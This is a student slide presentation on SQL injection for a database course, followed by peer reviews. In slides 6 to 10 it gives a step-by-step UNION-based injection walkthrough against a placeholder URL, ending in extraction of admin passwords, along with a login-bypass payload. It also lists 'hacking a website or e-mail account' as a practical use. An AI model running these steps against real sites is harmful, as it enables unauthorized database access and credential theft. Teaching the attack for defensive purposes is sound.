Embed Size (px)
Citation preview
Insider Attacks & SQL injection
1Database System
Subject
Database System
Group Number 13
O Sarmad Nazir Abbasi
O SP13-BSE-071
O Ehtisham Ullah
O SP13-BSE-013
2Database System
Members
1. Introduction
O SQL injection attacks
Methods to get unauthorized access to a
data or database
O There may be a lot of reason to attack or get
access to database (White hat)
3Database System
2. SQL Injection
O App sends form to user.
O Attacker submits form with SQL exploit data.
O Application builds string with exploit data.
O Application sends SQL query to DB.
O DB executes query, including exploit, sends data back to application.
O Application returns data to user.
Web Server
Attacker
DB Server
Firewall
User
Pass ‘ or 1=1--
Form
4Database System
3. Categories
O 1. SQL Manipulation
O 2. Code Injection
O 3. Function Call Injection
O 4. Buffer Overflows
5Database System
An Example (Injection)
O Select * from users where user name = ‘Sarmad’
and PASSWORD = ‘sarmadpassword’
The Attackers can manipulate the SQL statement
O Select * from users where user name = ‘Sarmad’
and PASSWORD = ‘1’ or ‘x’=‘x’
6Database System
4. How do we Inject (website)
Step 1:Take any site (Target)
Lets say
http://www.site.com/abc.php?id=5
Step 2:1. Check the vulnerability by adding ‘ to the above link.
If you get an error message it means that the site is
vulnerable to SQL injection.
Now you can be 100% sure that the site is vulnerable to
SQL injection.
7Database System
4. How do we Inject (website) cont...
Step 3:Find out the number of columns
To find number of columns we use statement ORDER BY
Just increment the number until we get an error.
http://www.site.com/abc.php?id=5 order by 1– <– no error
http://www.site.com/abc.php?id=5 order by 2– <– no error
http://www.site.com/abc.php?id=5 order by 3– <– no error
http://www.site.com/abc.php?id=5 order by 4– <– ERROR ( we
get some message like Unknown column ’4′ )
So we can conclude that the table have 4 columns
8Database System
4. How do we Inject (website) cont...
Step 4:Check for MySQL version by replacing 2 in the above step by
version()
http://www.site.com/abc.php?id=5 union all select 1,version(),3–
Now you can find the version from the site and only if it is found
to above 5, we can continue to the next steps.
Use information_schema
Why do we use information_schema? The reason is very simple
– ‘In mySQL 5 and higher versions, information_schema holds all
tables and columns in the database’.
9Database System
4. How do we Inject (website) cont...
Step 5:
To get tables we use table_name and
information_schema.tables
http://www.site.com/abc.php?id=5 union all select
1,table_name,3 from information_schema.tables–
Here We GO
Now we have the column and table names, just
retrieve the sensitive data like admin, user,
passwords, etc.10Database System
5. Disadvantages of SQL Injection
O Database Fingerprinting
O Denial of Service
O Bypassing Authentication
O Identifying Injectable Parameters
O Executing Remote Commands
O Performing Privilege Escalation
11Database System
6. Current Tools O SQL MAP
O SQL NINJA
Features:
O Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
O Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
12Database System
6. Current Tools (cont...)
O Support to directly connect to the database without
passing via a SQL injection, by providing DBMS
credentials, IP address, port and database name.
O Support to enumerate users, password hashes,
privileges, roles, databases, tables and columns
O Automatic recognition of password hash formats
and support for cracking them using a dictionary-
based attack.
13Database System
7. Practical Usage
O If your database is compromised that’s mean it has
been hacked and you want to crush your system
and it is not possible by using admin table.
O Hacking a website or e-mail account
O National Security services use SQL
injection(where possible) to achieve the data of
high potential.
14Database System
8. Latest Research
O IBM RESEARCH – SQL INJECTION OFTEN
LEADS TO A SUCCESSFUL BREACH
O New research from IBM’s X-Force team names SQL
injection as the most commonly traveled pathway to
a successful breach during the first half of 2013.
O No one is really surprised by this as SQL is the most
direct way to gain access to records in the database.
In terms of return on exploit, SQL is an effective
attack of opportunity.
15Database System
9. Future Work
O It is great to know we can access some where that
we are not authorize but the more exciting it is the
more it is challenging.
O For most of the people who are creating this data
some one can access and manipulate or delete or
what ever the attackers want so our future work
will be concern with making a secure database
16Database System
10. Lesson Learnt (Till Now)
O We learnt Team- Coordination
O We learnt Time Management
O We learnt Use of SQL Injection
17Database System
11. Conclusion
O This SQL Injection should be used for good and
positive purpose only but unfortunately many of
professionals are using SQL Injection in a negative
way and to break into unauthorized database
18Database System
12. References
@ https://www.imperva.com/resources/glossary/sql_injection.html
@ https://www.cc.gatech.edu/fac/Alex.Orso/.../halfond.viegas.orso.ISSSE06.pdf
@ https://www.udemy.com/blog/sql-injection-tutorial/
@ https://www.udemy.com/blog/sql-injection-tutorial/
@ http://www.guru99.com/learn-sql-injection-with-practical-example.html
@ http://www.w3schools.com/sql/sql_injection.asp
@ http://www.wikipedia.org/
@ http://alrt.co/1cqEGMY
Database System 19
Review by Sundas Tanveer and Ghalib Masood
Overall the presentation is good but following points need to be considered:
O Do not use slangs e.g. “damn” in the 6th slide.
O Use correct formatting e.g. dot should be followed by a capital letter, make ‘h’ of http links capital if the link is pasted at the start of line.
O “ ‘ “ and “1“ is used for no reason in 6th slide.
O Use bullets at the right place e.g. “Now here we go” should have been written without bullets.
O Add more visuals in presentation. Content is less.
O Details explanations as used in latest research should be avoided.
O Re-check your presentation and correct the formatting.
O Introduction should be clear and points should be easy to understand.
O Try to make presentation less complex and easy to understand.
Thankyou.
20Database System
Review by Sarmad Nazir And Ehtisham Ullah for Group #9
O Good, simple and formal slides accept the background color
O All the reports contents are covered
O This kind of back ground may cause visibility problems it will be good if you change back ground color
O A little bit animation would have made the presentation more interesting
O We hope this review will help you in improving your slides
O Best of Luck!!!
Database System 21
Database System 22
Database System 23
